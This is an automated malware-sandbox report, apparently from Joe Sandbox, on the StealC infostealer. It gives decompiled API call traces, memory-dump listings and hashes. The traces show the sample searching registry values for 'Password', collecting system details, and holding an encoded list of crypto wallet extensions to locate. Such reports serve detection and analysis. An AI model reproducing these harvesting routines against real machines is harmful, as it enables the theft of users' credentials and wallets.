                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: OpenProcesslstrcpymemset
                                                                                                                                                                            • String ID: sx$sx$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                                                                                            • API String ID: 224852652-3185190315
                                                                                                                                                                            • Opcode ID: 4bbdce9d90ff4d9e2ee025492fd5e8ed534adf600c51edbbc04f6f04a8d31def
                                                                                                                                                                            • Instruction ID: 27e6c5adeb46ff4d7be242454fc9465918f46bfa24e1b2bcb47ff62436b1bbd8
                                                                                                                                                                            • Opcode Fuzzy Hash: 4bbdce9d90ff4d9e2ee025492fd5e8ed534adf600c51edbbc04f6f04a8d31def
                                                                                                                                                                            • Instruction Fuzzy Hash: D25141B0D44218EFDB18EB90DC89BEDB774AF54304F2081A9E51666181EB7C6A88CF55
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 007772D0: memset.MSVCRT ref: 00777314
                                                                                                                                                                              • Part of subcall function 007772D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00777C90), ref: 0077733A
                                                                                                                                                                              • Part of subcall function 007772D0: RegEnumValueA.ADVAPI32(00777C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007773B1
                                                                                                                                                                              • Part of subcall function 007772D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0077740D
                                                                                                                                                                              • Part of subcall function 007772D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00777C90,80000001,007861C4,?,?,?,?,?,00777C90,?), ref: 00777452
                                                                                                                                                                              • Part of subcall function 007772D0: HeapFree.KERNEL32(00000000,?,?,?,?,00777C90,80000001,007861C4,?,?,?,?,?,00777C90,?), ref: 00777459
                                                                                                                                                                            • lstrcatA.KERNEL32(33548020,007917FC,00777C90,80000001,007861C4,?,?,?,?,?,00777C90,?,?,007861C4), ref: 00777606
                                                                                                                                                                            • lstrcatA.KERNEL32(33548020,00000000,00000000), ref: 00777648
                                                                                                                                                                            • lstrcatA.KERNEL32(33548020, : ), ref: 0077765A
                                                                                                                                                                            • lstrcatA.KERNEL32(33548020,00000000,00000000,00000000), ref: 0077768F
                                                                                                                                                                            • lstrcatA.KERNEL32(33548020,00791804), ref: 007776A0
                                                                                                                                                                            • lstrcatA.KERNEL32(33548020,00000000,00000000,00000000), ref: 007776D3
                                                                                                                                                                            • lstrcatA.KERNEL32(33548020,00791808), ref: 007776ED
                                                                                                                                                                            • task.LIBCPMTD ref: 007776FB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                                                            • String ID: :
                                                                                                                                                                            • API String ID: 3191641157-3653984579
                                                                                                                                                                            • Opcode ID: fcb03b9c9297b41d531438673e42273e45990e4c60904dfec6e6718185e12f4d
                                                                                                                                                                            • Instruction ID: b910c1371a587580c9c9eac3109aa841d245c79063bcaf59ca82f6d6c1b57415
                                                                                                                                                                            • Opcode Fuzzy Hash: fcb03b9c9297b41d531438673e42273e45990e4c60904dfec6e6718185e12f4d
                                                                                                                                                                            • Instruction Fuzzy Hash: B6316FB1914109EFCF48EBB4DD89DFF7378BB44311B548218F106A7290DA38AD46DB62
                                                                                                                                                                            APIs
                                                                                                                                                                            • memset.MSVCRT ref: 00777314
                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00777C90), ref: 0077733A
                                                                                                                                                                            • RegEnumValueA.ADVAPI32(00777C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007773B1
                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0077740D
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00777C90,80000001,007861C4,?,?,?,?,?,00777C90,?), ref: 00777452
                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00777C90,80000001,007861C4,?,?,?,?,?,00777C90,?), ref: 00777459
                                                                                                                                                                              • Part of subcall function 00779240: vsprintf_s.MSVCRT ref: 0077925B
                                                                                                                                                                            • task.LIBCPMTD ref: 00777555
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                                            • String ID: Password
                                                                                                                                                                            • API String ID: 2698061284-3434357891
                                                                                                                                                                            • Opcode ID: 45186caa64bc4a2a5d37ca92e97771f8e8ff808abfd8ce5713b2f334c86207cd
                                                                                                                                                                            • Instruction ID: 126786097ce1d54c7073bb164d372fc879172bfa740441ea345d680ce7f835a2
                                                                                                                                                                            • Opcode Fuzzy Hash: 45186caa64bc4a2a5d37ca92e97771f8e8ff808abfd8ce5713b2f334c86207cd
                                                                                                                                                                            • Instruction Fuzzy Hash: 076118B5944168DBDB24DB50CC85BDAB7B8BF44340F00C1E9E64DA6141DBB45BC9CFA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00787542
                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0078757F
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00787603
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0078760A
                                                                                                                                                                            • wsprintfA.USER32 ref: 00787640
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                            • String ID: :$C$\
                                                                                                                                                                            • API String ID: 3790021787-3809124531
                                                                                                                                                                            • Opcode ID: 8b845ef862c50d39939ce7e7484d20d452f738d61e176c5bc268f4c12ead5267
                                                                                                                                                                            • Instruction ID: eb8c43253b0eb5dfc3be49234448c96dee0058c7ca779562a6bc7ddf1f08205f
                                                                                                                                                                            • Opcode Fuzzy Hash: 8b845ef862c50d39939ce7e7484d20d452f738d61e176c5bc268f4c12ead5267
                                                                                                                                                                            • Instruction Fuzzy Hash: 3841A6B1E44248EBDF14EF94DC89BDEBBB8EF08710F100199F50967280D778AA44CBA5
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFBD0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 007847DB
                                                                                                                                                                              • Part of subcall function 00788DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00788E0B
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00784801
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00784820
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00784834
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFA478), ref: 00784847
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0078485B
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00D00180), ref: 0078486F
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 00788D90: GetFileAttributesA.KERNEL32(00000000,?,00780117,?,00000000,?,00000000,00790DAB,00790DAA), ref: 00788D9F
                                                                                                                                                                              • Part of subcall function 00784570: GetProcessHeap.KERNEL32(00000000,Db2luOTggV2FsbGV0fGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF8MHwwfEVWRVIgV2FsbGV0fGNnZWVvZHBmYWdqY2VlZmllZmxtZGZwaHBsa2VubGZrfDF8MHwwfEthcmRpYUNoYWluIFdhbGxldHxwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3wxfDB8MHxSYWJieXxhY21hY29ka2piZGdtb2xlZWJvbG1kam9uaWx), ref: 00784580
                                                                                                                                                                              • Part of subcall function 00784570: HeapAlloc.KERNEL32(00000000), ref: 00784587
                                                                                                                                                                              • Part of subcall function 00784570: wsprintfA.USER32 ref: 007845A6
                                                                                                                                                                              • Part of subcall function 00784570: FindFirstFileA.KERNEL32(?,?), ref: 007845BD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                            • String ID: 0ax
                                                                                                                                                                            • API String ID: 167551676-4178747242
                                                                                                                                                                            • Opcode ID: ce6fdf824e02baf874f4e91cc24d57cd129225b0a5f8a4e2515003c24be70820
                                                                                                                                                                            • Instruction ID: 051ab23e5a0a1d1500500e963c2c17389d14b986fe1b70b6b06f895cbee590a7
                                                                                                                                                                            • Opcode Fuzzy Hash: ce6fdf824e02baf874f4e91cc24d57cd129225b0a5f8a4e2515003c24be70820
                                                                                                                                                                            • Instruction Fuzzy Hash: E13186B2950208A7CB54F7B0DC89EED737CBB58700F404589F31996081EE78AB89CF96
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00CFF810,00000000,?,00790E2C,00000000,?,00000000), ref: 00788130
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00CFF810,00000000,?,00790E2C,00000000,?,00000000,00000000), ref: 00788137
                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00788158
                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00788172
                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00788180
                                                                                                                                                                            • wsprintfA.USER32 ref: 007881AC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                            • String ID: %d MB$@
                                                                                                                                                                            • API String ID: 2886426298-3474575989
                                                                                                                                                                            • Opcode ID: 4d89b991adab7bafbec617a507cfb29e6869cb7e6c9841028804eef7e90f5349
                                                                                                                                                                            • Instruction ID: 28858646069ce85553267edceda3eb3340e6c4e98ba3243302639aec3e7ed14c
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d89b991adab7bafbec617a507cfb29e6869cb7e6c9841028804eef7e90f5349
                                                                                                                                                                            • Instruction Fuzzy Hash: C4211DF1E44218ABDB14DFD4CD49FAEB7B8FB44B10F104609F605BB280DB7869018BA6
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                              • Part of subcall function 00779E10: memcmp.MSVCRT(?,v20,00000003), ref: 00779E2D
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0077BC9F
                                                                                                                                                                              • Part of subcall function 00788E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00788E52
                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0077BCCD
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0077BDA5
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0077BDB9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
